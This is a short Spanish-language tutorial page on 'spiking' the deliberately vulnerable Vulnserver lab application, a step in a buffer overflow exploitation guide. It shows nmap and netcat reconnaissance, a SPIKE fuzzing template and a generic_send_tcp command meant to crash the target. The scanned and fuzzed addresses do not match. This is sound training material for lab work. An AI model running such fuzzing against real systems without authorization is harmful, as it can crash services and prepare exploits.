Spiking

Conectarse y listar funciones....

# nmap -sV -sC -p2233 192.168.240.10 -v
Nmap scan report for 192.168.240.10
Host is up (0.088s latency).
PORT     STATE SERVICE    VERSION
2233/tcp open  infocrypt?

# nc -nv 192.168.240.10 2233
Welcome to Vulnerable Server! Enter HELP for help.
HELP
Valid Commands:
HELP
STATS [stat_value]
RTIME [rtime_value]
LTIME [ltime_value]
SRUN [srun_value]
TRUN [trun_value]
GMON [gmon_value]
GDOG [gdog_value]
KSTET [kstet_value]
GTER [gter_value]
HTER [hter_value]
LTER [lter_value]
KSTAN [lstan_value]
EXIT

Probar cada una con Immunity Debugger para identificar la funcion vulnerable:

s_readline():
s_string("FUNCION ");
s_string_variable("0");

Con este comando se busca que el serividor victima explote con la funcion:

 generic_send_tcp 192.168.174.136 9999 func.spk 0 0

AnteriorExplotacion del Buffer Overflow SiguienteFuzzing

Última actualización hace 5 meses